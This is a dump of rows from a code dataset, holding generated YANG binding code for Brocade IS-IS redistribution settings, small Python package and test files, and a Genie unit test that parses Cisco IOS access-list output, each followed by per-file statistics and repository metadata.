'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="ospf-level2", rest_name="level-2", parent=self, choice=(u'ch-ospf-levels', u'ca-ospf-level2'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'IS-IS Level-2 routes only', u'alt-name': u'level-2', u'cli-full-no': None}}, namespace='urn:brocade.com:mgmt:brocade-isis', defining_module='brocade-isis', yang_type='empty', is_config=True)""",
})
self.__ospf_level2 = t
if hasattr(self, '_set'):
self._set()
def _unset_ospf_level2(self):
self.__ospf_level2 = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="ospf-level2", rest_name="level-2", parent=self, choice=(u'ch-ospf-levels', u'ca-ospf-level2'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'IS-IS Level-2 routes only', u'alt-name': u'level-2', u'cli-full-no': None}}, namespace='urn:brocade.com:mgmt:brocade-isis', defining_module='brocade-isis', yang_type='empty', is_config=True)
def _get_ospf_level12(self):
"""
Getter method for ospf_level12, mapped from YANG variable /routing_system/router/isis/router_isis_cmds_holder/address_family/ipv4/af_ipv4_unicast/af_ipv4_attributes/af_common_attributes/redistribute/ospf/ospf_level12 (empty)
"""
return self.__ospf_level12
def _set_ospf_level12(self, v, load=False):
"""
Setter method for ospf_level12, mapped from YANG variable /routing_system/router/isis/router_isis_cmds_holder/address_family/ipv4/af_ipv4_unicast/af_ipv4_attributes/af_common_attributes/redistribute/ospf/ospf_level12 (empty)
If this variable is read-only (config: false) in the
source YANG file, then _set_ospf_level12 is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_ospf_level12() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="ospf-level12", rest_name="level-1-2", parent=self, choice=(u'ch-ospf-levels', u'ca-ospf-level12'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'IS-IS Level-1-2 routes', u'alt-name': u'level-1-2', u'cli-full-no': None}}, namespace='urn:brocade.com:mgmt:brocade-isis', defining_module='brocade-isis', yang_type='empty', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """ospf_level12 must be of a type compatible with empty""",
'defined-type': "empty",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="ospf-level12", rest_name="level-1-2", parent=self, choice=(u'ch-ospf-levels', u'ca-ospf-level12'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'IS-IS Level-1-2 routes', u'alt-name': u'level-1-2', u'cli-full-no': None}}, namespace='urn:brocade.com:mgmt:brocade-isis', defining_module='brocade-isis', yang_type='empty', is_config=True)""",
})
self.__ospf_level12 = t
if hasattr(self, '_set'):
self._set()
def _unset_ospf_level12(self):
self.__ospf_level12 = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="ospf-level12", rest_name="level-1-2", parent=self, choice=(u'ch-ospf-levels', u'ca-ospf-level12'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'IS-IS Level-1-2 routes', u'alt-name': u'level-1-2', u'cli-full-no': None}}, namespace='urn:brocade.com:mgmt:brocade-isis', defining_module='brocade-isis', yang_type='empty', is_config=True)
def _get_ospf_metric_type(self):
"""
Getter method for ospf_metric_type, mapped from YANG variable /routing_system/router/isis/router_isis_cmds_holder/address_family/ipv4/af_ipv4_unicast/af_ipv4_attributes/af_common_attributes/redistribute/ospf/ospf_metric_type (is-metric-type-t)
"""
return self.__ospf_metric_type
def _set_ospf_metric_type(self, v, load=False):
"""
Setter method for ospf_metric_type, mapped from YANG variable /routing_system/router/isis/router_isis_cmds_holder/address_family/ipv4/af_ipv4_unicast/af_ipv4_attributes/af_common_attributes/redistribute/ospf/ospf_metric_type (is-metric-type-t)
If this variable is read-only (config: false) in the
source YANG file, then _set_ospf_metric_type is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_ospf_metric_type() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'internal': {'value': 1}, u'external': {'value': 2}},), default=unicode("internal"), is_leaf=True, yang_name="ospf-metric-type", rest_name="metric-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'IS-IS metric type for redistributed routes', u'alt-name': u'metric-type'}}, namespace='urn:brocade.com:mgmt:brocade-isis', defining_module='brocade-isis', yang_type='is-metric-type-t', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """ospf_metric_type must be of a type compatible with is-metric-type-t""",
'defined-type': "brocade-isis:is-metric-type-t",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'internal': {'value': 1}, u'external': {'value': 2}},), default=unicode("internal"), is_leaf=True, yang_name="ospf-metric-type", rest_name="metric-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'IS-IS metric type for redistributed routes', u'alt-name': u'metric-type'}}, namespace='urn:brocade.com:mgmt:brocade-isis', defining_module='brocade-isis', yang_type='is-metric-type-t', is_config=True)""",
})
self.__ospf_metric_type = t
if hasattr(self, '_set'):
self._set()
def _unset_ospf_metric_type(self):
self.__ospf_metric_type = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'internal': {'value': 1}, u'external': {'value': 2}},), default=unicode("internal"), is_leaf=True, yang_name="ospf-metric-type", rest_name="metric-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'IS-IS metric type for redistributed routes', u'alt-name': u'metric-type'}}, namespace='urn:brocade.com:mgmt:brocade-isis', defining_module='brocade-isis', yang_type='is-metric-type-t', is_config=True)
match = __builtin__.property(_get_match, _set_match)
ospf_metric = __builtin__.property(_get_ospf_metric, _set_ospf_metric)
ospf_route_map = __builtin__.property(_get_ospf_route_map, _set_ospf_route_map)
ospf_level1 = __builtin__.property(_get_ospf_level1, _set_ospf_level1)
ospf_level2 = __builtin__.property(_get_ospf_level2, _set_ospf_level2)
ospf_level12 = __builtin__.property(_get_ospf_level12, _set_ospf_level12)
ospf_metric_type = __builtin__.property(_get_ospf_metric_type, _set_ospf_metric_type)
__choices__ = {u'ch-ospf-levels': {u'ca-ospf-level2': [u'ospf_level2'], u'ca-ospf-level12': [u'ospf_level12'], u'ca-ospf-level1': [u'ospf_level1']}}
_pyangbind_elements = {'match': match, 'ospf_metric': ospf_metric, 'ospf_route_map': ospf_route_map, 'ospf_level1': ospf_level1, 'ospf_level2': ospf_level2, 'ospf_level12': ospf_level12, 'ospf_metric_type': ospf_metric_type, }
| 84.607784 | 700 | 0.731024 | 4,100 | 28,259 | 4.796829 | 0.051951 | 0.035593 | 0.034169 | 0.025627 | 0.870748 | 0.841257 | 0.826461 | 0.817257 | 0.811868 | 0.807088 | 0 | 0.013704 | 0.124597 | 28,259 | 333 | 701 | 84.861862 | 0.781308 | 0.183658 | 0 | 0.442857 | 0 | 0.033333 | 0.393558 | 0.132887 | 0 | 0 | 0 | 0 | 0 | 1 | 0.114286 | false | 0 | 0.042857 | 0 | 0.280952 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
b2535d811e1ff1c05fb25d28ac3da82811b86902 | 176 | py | Python | sygnal/datasets/__init__.py | i-machine-think/signal | 2220b4512e3c2f3b8f700668bd9727ec966817f7 | [
"MIT"
] | 6 | 2019-07-24T14:46:52.000Z | 2019-12-10T11:37:10.000Z | sygnal/datasets/__init__.py | i-machine-think/signal | 2220b4512e3c2f3b8f700668bd9727ec966817f7 | [
"MIT"
] | 11 | 2019-07-29T12:44:15.000Z | 2019-08-07T16:10:04.000Z | sygnal/datasets/__init__.py | i-machine-think/signal | 2220b4512e3c2f3b8f700668bd9727ec966817f7 | [
"MIT"
] | 6 | 2019-07-28T11:26:29.000Z | 2021-01-18T11:08:24.000Z | from .diagnostic_dataset import DiagnosticDataset
from .image_dataset import ImageDataset
from .message_dataset import MessageDataset
from .shapes_dataset import ShapesDataset
| 35.2 | 49 | 0.886364 | 20 | 176 | 7.6 | 0.55 | 0.342105 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.090909 | 176 | 4 | 50 | 44 | 0.95 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
b296df81a0810445ec66154aef63ed7513d25f14 | 96 | py | Python | venv/lib/python3.8/site-packages/poetry/core/factory.py | GiulianaPola/select_repeats | 17a0d053d4f874e42cf654dd142168c2ec8fbd11 | [
"MIT"
] | 2 | 2022-03-13T01:58:52.000Z | 2022-03-31T06:07:54.000Z | venv/lib/python3.8/site-packages/poetry/core/factory.py | DesmoSearch/Desmobot | b70b45df3485351f471080deb5c785c4bc5c4beb | [
"MIT"
] | 19 | 2021-11-20T04:09:18.000Z | 2022-03-23T15:05:55.000Z | venv/lib/python3.8/site-packages/poetry/core/factory.py | DesmoSearch/Desmobot | b70b45df3485351f471080deb5c785c4bc5c4beb | [
"MIT"
] | null | null | null | /home/runner/.cache/pip/pool/51/01/06/1ca97172121ed8f44c688010c356bfac33a63d4683a072e094af7bb8e4 | 96 | 96 | 0.895833 | 9 | 96 | 9.555556 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.458333 | 0 | 96 | 1 | 96 | 96 | 0.4375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
a26556457d9404f57c677a208266d61602b97dc9 | 30 | py | Python | python/testData/completion/notImportedQualifiedName/ImportForModuleFunction/main.after.py | 06needhamt/intellij-community | 63d7b8030e4fdefeb4760e511e289f7e6b3a5c5b | [
"Apache-2.0"
] | null | null | null | python/testData/completion/notImportedQualifiedName/ImportForModuleFunction/main.after.py | 06needhamt/intellij-community | 63d7b8030e4fdefeb4760e511e289f7e6b3a5c5b | [
"Apache-2.0"
] | null | null | null | python/testData/completion/notImportedQualifiedName/ImportForModuleFunction/main.after.py | 06needhamt/intellij-community | 63d7b8030e4fdefeb4760e511e289f7e6b3a5c5b | [
"Apache-2.0"
] | null | null | null | import foo.bar
foo.bar.func() | 10 | 14 | 0.733333 | 6 | 30 | 3.666667 | 0.666667 | 0.545455 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.1 | 30 | 3 | 15 | 10 | 0.814815 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
a2c3292b886046b97b4f982ee157adeb70c4896d | 41,537 | py | Python | src/genie/libs/parser/ios/tests/test_show_acl.py | nujo/genieparser | 083b01efc46afc32abe1a1858729578beab50cd3 | [
"Apache-2.0"
] | 2 | 2021-01-27T03:37:39.000Z | 2021-01-27T03:40:50.000Z | src/genie/libs/parser/ios/tests/test_show_acl.py | nujo/genieparser | 083b01efc46afc32abe1a1858729578beab50cd3 | [
"Apache-2.0"
] | 1 | 2020-08-01T00:23:31.000Z | 2020-08-01T00:40:05.000Z | src/genie/libs/parser/ios/tests/test_show_acl.py | nujo/genieparser | 083b01efc46afc32abe1a1858729578beab50cd3 | [
"Apache-2.0"
] | null | null | null | #!/bin/env python
import unittest
from unittest.mock import Mock
from pyats.topology import Device
from genie.metaparser.util.exceptions import SchemaEmptyParserError,\
SchemaMissingKeyError
from genie.libs.parser.ios.show_acl import ShowAccessLists
from genie.libs.parser.iosxe.tests.test_show_acl import TestShowAccessLists as TestShowAccessListsIosxe
class TestShowAccessLists(TestShowAccessListsIosxe):
maxDiff = None
golden_output_standard = {'execute.return_value': '''\
Switch# show ip access-lists
Standard IP access list 1
permit 172.20.10.10
Standard IP access list 10
permit 10.66.12.12
Standard IP access list 12
deny 10.16.3.2
Standard IP access list 32
permit 172.20.20.20
Standard IP access list 34
permit 10.24.35.56
permit 10.34.56.34
'''}
golden_parsed_output_standard = {
'1': {
'aces': {
'10': {
'actions': {
'forwarding': 'permit'
},
'matches': {
'l3': {
'ipv4': {
'protocol': 'ipv4',
'source_network': {
'172.20.10.10 0.0.0.0': {
'source_network': '172.20.10.10 0.0.0.0'
}
}
}
}
},
'name': '10'
}
},
'name': '1',
'type': 'ipv4-acl-type'
},
'10': {
'aces': {
'10': {
'actions': {
'forwarding': 'permit'
},
'matches': {
'l3': {
'ipv4': {
'protocol': 'ipv4',
'source_network': {
'10.66.12.12 0.0.0.0': {
'source_network': '10.66.12.12 0.0.0.0'
}
}
}
}
},
'name': '10'
}
},
'name': '10',
'type': 'ipv4-acl-type'
},
'12': {
'aces': {
'10': {
'actions': {
'forwarding': 'deny'
},
'matches': {
'l3': {
'ipv4': {
'protocol': 'ipv4',
'source_network': {
'10.16.3.2 0.0.0.0': {
'source_network': '10.16.3.2 0.0.0.0'
}
}
}
}
},
'name': '10'
}
},
'name': '12',
'type': 'ipv4-acl-type'
},
'32': {
'aces': {
'10': {
'actions': {
'forwarding': 'permit'
},
'matches': {
'l3': {
'ipv4': {
'protocol': 'ipv4',
'source_network': {
'172.20.20.20 0.0.0.0': {
'source_network': '172.20.20.20 0.0.0.0'
}
}
}
}
},
'name': '10'
}
},
'name': '32',
'type': 'ipv4-acl-type'
},
'34': {
'aces': {
'10': {
'actions': {
'forwarding': 'permit'
},
'matches': {
'l3': {
'ipv4': {
'protocol': 'ipv4',
'source_network': {
'10.24.35.56 0.0.0.0': {
'source_network': '10.24.35.56 0.0.0.0'
}
}
}
}
},
'name': '10'
},
'20': {
'actions': {
'forwarding': 'permit'
},
'matches': {
'l3': {
'ipv4': {
'protocol': 'ipv4',
'source_network': {
'10.34.56.34 0.0.0.0': {
'source_network': '10.34.56.34 0.0.0.0'
}
}
}
}
},
'name': '20'
}
},
'name': '34',
'type': 'ipv4-acl-type'
}
}
golden_output_ios = {'execute.return_value': '''\
Router# show access-lists 101
Extended IP access list 101
10 permit ip host 10.3.3.3 host 10.5.5.34
20 permit icmp any any
30 permit ip host 10.34.2.2 host 10.2.54.2
40 permit ip host 10.3.4.31 host 10.3.32.3 log
'''}
golden_parsed_output_ios = {
"101": {
"name": "101",
"type": "ipv4-acl-type",
"aces": {
"10": {
"name": "10",
"actions": {
"forwarding": "permit",
"logging": "log-none"
},
"matches": {
"l3": {
"ipv4": {
"protocol": "ipv4",
"source_network": {
"host 10.3.3.3": {
"source_network": "host 10.3.3.3"
}
},
"destination_network": {
"host 10.5.5.34": {
"destination_network": "host 10.5.5.34"
}
}
}
},
"l4": {
"ipv4": {
"established": False
}
}
}
},
"20": {
"name": "20",
"actions": {
"forwarding": "permit",
"logging": "log-none"
},
"matches": {
"l3": {
"ipv4": {
"protocol": "icmp",
"source_network": {
"any": {
"source_network": "any"
}
},
"destination_network": {
"any": {
"destination_network": "any"
}
}
}
},
"l4": {
"icmp": {
"established": False
}
}
}
},
"30": {
"name": "30",
"actions": {
"forwarding": "permit",
"logging": "log-none"
},
"matches": {
"l3": {
"ipv4": {
"protocol": "ipv4",
"source_network": {
"host 10.34.2.2": {
"source_network": "host 10.34.2.2"
}
},
"destination_network": {
"host 10.2.54.2": {
"destination_network": "host 10.2.54.2"
}
}
}
},
"l4": {
"ipv4": {
"established": False
}
}
}
},
"40": {
"name": "40",
"actions": {
"forwarding": "permit",
"logging": "log-syslog"
},
"matches": {
"l3": {
"ipv4": {
"protocol": "ipv4",
"source_network": {
"host 10.3.4.31": {
"source_network": "host 10.3.4.31"
}
},
"destination_network": {
"host 10.3.32.3": {
"destination_network": "host 10.3.32.3"
}
}
}
},
"l4": {
"ipv4": {
"established": False
}
}
}
}
}
}
}
golden_output_customer1 = {'execute.return_value': '''
Extended IP access list acl1
10 permit icmp any any echo
20 permit icmp any any echo-reply (1195 matches)
30 permit icmp any any ttl-exceeded
40 permit icmp any any unreachable
50 permit icmp any any packet-too-big
60 deny icmp any any
80 permit udp any host 10.4.1.1 eq 1985
'''
}
golden_parsed_output_customer1 = {
'acl1': {
'name': 'acl1',
'type': 'ipv4-acl-type',
'aces': {
'10': {
'name': '10',
'actions': {
'forwarding': 'permit',
'logging': 'log-none'
},
'matches': {
'l3': {
'ipv4': {
'protocol': 'icmp',
'source_network': {
'any': {
'source_network': 'any'
}
},
'destination_network': {
'any': {
'destination_network': 'any'
}
}
}
},
'l4': {
'icmp': {
'established': False,
'msg_type': 'echo'
}
}
}
},
'20': {
'name': '20',
'actions': {
'forwarding': 'permit',
'logging': 'log-none'
},
'statistics': {
'matched_packets': 1195
},
'matches': {
'l3': {
'ipv4': {
'protocol': 'icmp',
'source_network': {
'any': {
'source_network': 'any'
}
},
'destination_network': {
'any': {
'destination_network': 'any'
}
}
}
},
'l4': {
'icmp': {
'established': False,
'msg_type': 'echo-reply'
}
}
}
},
'30': {
'name': '30',
'actions': {
'forwarding': 'permit',
'logging': 'log-none'
},
'matches': {
'l3': {
'ipv4': {
'protocol': 'icmp',
'source_network': {
'any': {
'source_network': 'any'
}
},
'destination_network': {
'any': {
'destination_network': 'any'
}
}
}
},
'l4': {
'icmp': {
'established': False,
'msg_type': 'ttl-exceeded'
}
}
}
},
'40': {
'name': '40',
'actions': {
'forwarding': 'permit',
'logging': 'log-none'
},
'matches': {
'l3': {
'ipv4': {
'protocol': 'icmp',
'source_network': {
'any': {
'source_network': 'any'
}
},
'destination_network': {
'any': {
'destination_network': 'any'
}
}
}
},
'l4': {
'icmp': {
'established': False,
'msg_type': 'unreachable'
}
}
}
},
'50': {
'name': '50',
'actions': {
'forwarding': 'permit',
'logging': 'log-none'
},
'matches': {
'l3': {
'ipv4': {
'protocol': 'icmp',
'source_network': {
'any': {
'source_network': 'any'
}
},
'destination_network': {
'any': {
'destination_network': 'any'
}
}
}
},
'l4': {
'icmp': {
'established': False,
'msg_type': 'packet-too-big'
}
}
}
},
'60': {
'name': '60',
'actions': {
'forwarding': 'deny',
'logging': 'log-none'
},
'matches': {
'l3': {
'ipv4': {
'protocol': 'icmp',
'source_network': {
'any': {
'source_network': 'any'
}
},
'destination_network': {
'any': {
'destination_network': 'any'
}
}
}
},
'l4': {
'icmp': {
'established': False
}
}
}
},
'80': {
'name': '80',
'actions': {
'forwarding': 'permit',
'logging': 'log-none'
},
'matches': {
'l3': {
'ipv4': {
'protocol': 'udp',
'source_network': {
'any': {
'source_network': 'any'
}
},
'destination_network': {
'host 10.4.1.1': {
'destination_network': 'host 10.4.1.1'
}
}
}
},
'l4': {
'udp': {
'established': False,
'destination_port': {
'operator': {
'operator': 'eq',
'port': 1985
}
}
}
}
}
}
}
}
}
golden_output_customer2 = {'execute.return_value': '''
Extended IP access list acl1
10 permit icmp any any
20 permit udp any host 10.4.1.1 eq 1985 (67 matches)
30 permit ip object-group dummydpd-local object-group dummydpd-remote
'''
}
golden_parsed_output_customer2 = {
'acl1': {
'name': 'acl1',
'type': 'ipv4-acl-type',
'aces': {
'10': {
'name': '10',
'actions': {
'forwarding': 'permit',
'logging': 'log-none'
},
'matches': {
'l3': {
'ipv4': {
'protocol': 'icmp',
'source_network': {
'any': {
'source_network': 'any'
}
},
'destination_network': {
'any': {
'destination_network': 'any'
}
}
}
},
'l4': {
'icmp': {
'established': False
}
}
}
},
'20': {
'name': '20',
'actions': {
'forwarding': 'permit',
'logging': 'log-none'
},
'statistics': {
'matched_packets': 67
},
'matches': {
'l3': {
'ipv4': {
'protocol': 'udp',
'source_network': {
'any': {
'source_network': 'any'
}
},
'destination_network': {
'host 10.4.1.1': {
'destination_network': 'host 10.4.1.1'
}
}
}
},
'l4': {
'udp': {
'established': False,
'destination_port': {
'operator': {
'operator': 'eq',
'port': 1985
}
}
}
}
}
},
'30': {
'name': '30',
'actions': {
'forwarding': 'permit',
'logging': 'log-none'
},
'matches': {
'l3': {
'ipv4': {
'protocol': 'ipv4',
'source_network': {
'object-group dummydpd-local': {
'source_network': 'object-group dummydpd-local'
}
},
'destination_network': {
'object-group dummydpd-remote': {
'destination_network': 'object-group dummydpd-remote'
}
}
}
},
'l4': {
'ipv4': {
'established': False
}
}
}
}
}
}
}
golden_output_customer3 = {'execute.return_value': '''
Extended IP access list acl1
10 permit icmp any any echo
20 permit icmp any any echo-reply (198 matches)
40 permit icmp any any unreachable
50 permit icmp any any packet-too-big
60 deny icmp any any
70 permit ip object-group grt-interface-nets object-group grt-interface-nets
80 permit udp any host 10.4.1.1 eq 1985
90 permit esp object-group vpn-endpoints-dummydpd host 10.4.1.1 (14 matches)
100 permit ahp object-group vpn-endpoints-dummydpd host 10.4.1.1
110 permit udp object-group vpn-endpoints-dummydpd host 10.4.1.1 eq isakmp (122 matches)
'''
}
golden_parsed_output_customer3 = {
'acl1': {
'name': 'acl1',
'type': 'ipv4-acl-type',
'aces': {
'10': {
'name': '10',
'actions': {
'forwarding': 'permit',
'logging': 'log-none'
},
'matches': {
'l3': {
'ipv4': {
'protocol': 'icmp',
'source_network': {
'any': {
'source_network': 'any'
}
},
'destination_network': {
'any': {
'destination_network': 'any'
}
}
}
},
'l4': {
'icmp': {
'established': False,
'msg_type': 'echo'
}
}
}
},
'20': {
'name': '20',
'actions': {
'forwarding': 'permit',
'logging': 'log-none'
},
'statistics': {
'matched_packets': 198
},
'matches': {
'l3': {
'ipv4': {
'protocol': 'icmp',
'source_network': {
'any': {
'source_network': 'any'
}
},
'destination_network': {
'any': {
'destination_network': 'any'
}
}
}
},
'l4': {
'icmp': {
'established': False,
'msg_type': 'echo-reply'
}
}
}
},
'40': {
'name': '40',
'actions': {
'forwarding': 'permit',
'logging': 'log-none'
},
'matches': {
'l3': {
'ipv4': {
'protocol': 'icmp',
'source_network': {
'any': {
'source_network': 'any'
}
},
'destination_network': {
'any': {
'destination_network': 'any'
}
}
}
},
'l4': {
'icmp': {
'established': False,
'msg_type': 'unreachable'
}
}
}
},
'50': {
'name': '50',
'actions': {
'forwarding': 'permit',
'logging': 'log-none'
},
'matches': {
'l3': {
'ipv4': {
'protocol': 'icmp',
'source_network': {
'any': {
'source_network': 'any'
}
},
'destination_network': {
'any': {
'destination_network': 'any'
}
}
}
},
'l4': {
'icmp': {
'established': False,
'msg_type': 'packet-too-big'
}
}
}
},
'60': {
'name': '60',
'actions': {
'forwarding': 'deny',
'logging': 'log-none'
},
'matches': {
'l3': {
'ipv4': {
'protocol': 'icmp',
'source_network': {
'any': {
'source_network': 'any'
}
},
'destination_network': {
'any': {
'destination_network': 'any'
}
}
}
},
'l4': {
'icmp': {
'established': False
}
}
}
},
'70': {
'name': '70',
'actions': {
'forwarding': 'permit',
'logging': 'log-none'
},
'matches': {
'l3': {
'ipv4': {
'protocol': 'ipv4',
'source_network': {
'object-group grt-interface-nets': {
'source_network': 'object-group grt-interface-nets'
}
},
'destination_network': {
'object-group grt-interface-nets': {
'destination_network': 'object-group grt-interface-nets'
}
}
}
},
'l4': {
'ipv4': {
'established': False
}
}
}
},
'80': {
'name': '80',
'actions': {
'forwarding': 'permit',
'logging': 'log-none'
},
'matches': {
'l3': {
'ipv4': {
'protocol': 'udp',
'source_network': {
'any': {
'source_network': 'any'
}
},
'destination_network': {
'host 10.4.1.1': {
'destination_network': 'host 10.4.1.1'
}
}
}
},
'l4': {
'udp': {
'established': False,
'destination_port': {
'operator': {
'operator': 'eq',
'port': 1985
}
}
}
}
}
},
'90': {
'name': '90',
'actions': {
'forwarding': 'permit',
'logging': 'log-none'
},
'statistics': {
'matched_packets': 14
},
'matches': {
'l3': {
'ipv4': {
'protocol': 'esp',
'source_network': {
'object-group vpn-endpoints-dummydpd': {
'source_network': 'object-group vpn-endpoints-dummydpd'
}
},
'destination_network': {
'host 10.4.1.1': {
'destination_network': 'host 10.4.1.1'
}
}
}
},
'l4': {
'esp': {
'established': False
}
}
}
},
'100': {
'name': '100',
'actions': {
'forwarding': 'permit',
'logging': 'log-none'
},
'matches': {
'l3': {
'ipv4': {
'protocol': 'ahp',
'source_network': {
'object-group vpn-endpoints-dummydpd': {
'source_network': 'object-group vpn-endpoints-dummydpd'
}
},
'destination_network': {
'host 10.4.1.1': {
'destination_network': 'host 10.4.1.1'
}
}
}
},
'l4': {
'ahp': {
'established': False
}
}
}
},
'110': {
'name': '110',
'actions': {
'forwarding': 'permit',
'logging': 'log-none'
},
'statistics': {
'matched_packets': 122
},
'matches': {
'l3': {
'ipv4': {
'protocol': 'udp',
'source_network': {
'object-group vpn-endpoints-dummydpd': {
'source_network': 'object-group vpn-endpoints-dummydpd'
}
},
'destination_network': {
'host 10.4.1.1': {
'destination_network': 'host 10.4.1.1'
}
}
}
},
'l4': {
'udp': {
'established': False,
'destination_port': {
'operator': {
'operator': 'eq',
'port': 500
}
}
}
}
}
}
}
}
}
def test_empty(self):
self.dev1 = Mock(**self.empty_output)
obj = ShowAccessLists(device=self.dev1)
with self.assertRaises(SchemaEmptyParserError):
parsed_output = obj.parse()
def test_golden_standard(self):
self.dev1 = Mock(**self.golden_output_standard)
obj = ShowAccessLists(device=self.dev1)
parsed_output = obj.parse()
self.assertEqual(parsed_output,self.golden_parsed_output_standard)
def test_golden_ios(self):
self.dev1 = Mock(**self.golden_output_ios)
obj = ShowAccessLists(device=self.dev1)
parsed_output = obj.parse()
self.assertEqual(parsed_output,self.golden_parsed_output_ios)
def test_golden_customer1(self):
self.dev_c3850 = Mock(**self.golden_output_customer1)
obj = ShowAccessLists(device=self.dev_c3850)
parsed_output = obj.parse(acl='acl1')
self.assertEqual(parsed_output, self.golden_parsed_output_customer1)
def test_golden_customer2(self):
self.dev_c3850 = Mock(**self.golden_output_customer2)
obj = ShowAccessLists(device=self.dev_c3850)
parsed_output = obj.parse(acl='acl1')
self.assertEqual(parsed_output, self.golden_parsed_output_customer2)
def test_golden_customer3(self):
self.dev_c3850 = Mock(**self.golden_output_customer3)
obj = ShowAccessLists(device=self.dev_c3850)
parsed_output = obj.parse(acl='acl1')
self.assertEqual(parsed_output, self.golden_parsed_output_customer3)
if __name__ == '__main__':
unittest.main()
| 40.132367 | 104 | 0.2147 | 1,812 | 41,537 | 4.799669 | 0.082781 | 0.089686 | 0.058871 | 0.072439 | 0.8089 | 0.785558 | 0.761182 | 0.722318 | 0.695757 | 0.681729 | 0 | 0.065601 | 0.698702 | 41,537 | 1,034 | 105 | 40.17118 | 0.629325 | 0.000385 | 0 | 0.51731 | 0 | 0.001978 | 0.1942 | 0.004769 | 0 | 0 | 0 | 0 | 0.005935 | 1 | 0.005935 | false | 0 | 0.005935 | 0 | 0.023739 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0c35999a2085e158a0eb11f37f112b981e71706d | 12,695 | py | Python | tests/test_cdp.py | Phill240/chrome-remote-interface-py | 285172f369c2210d986545aa99450a672ed847e6 | [
"Apache-2.0"
] | 5 | 2018-11-10T01:02:23.000Z | 2020-08-13T19:02:08.000Z | tests/test_cdp.py | Phill240/chrome-remote-interface-py | 285172f369c2210d986545aa99450a672ed847e6 | [
"Apache-2.0"
] | 2 | 2018-11-10T01:01:42.000Z | 2018-11-10T01:02:53.000Z | tests/test_cdp.py | Phill240/chrome-remote-interface-py | 285172f369c2210d986545aa99450a672ed847e6 | [
"Apache-2.0"
] | 3 | 2019-11-01T21:17:51.000Z | 2021-07-16T02:58:53.000Z | from typing import Dict, List, Callable, Any, Optional
import pytest
from aiohttp import ClientConnectorError
from cripy.cdp import CDP
from .helpers import (
Cleaner,
evaluation_result,
make_target_selector,
get_target_from_list,
)
TARGET_SELECTORS: List[Callable[[List[Dict[str, str]]], Any]] = [
make_target_selector("dict"),
make_target_selector("idx"),
make_target_selector("str"),
]
TARGET_SELECTORS_IDS: List[str] = [
"function returning target dict",
"function returning target index",
"function returning target ws url",
]
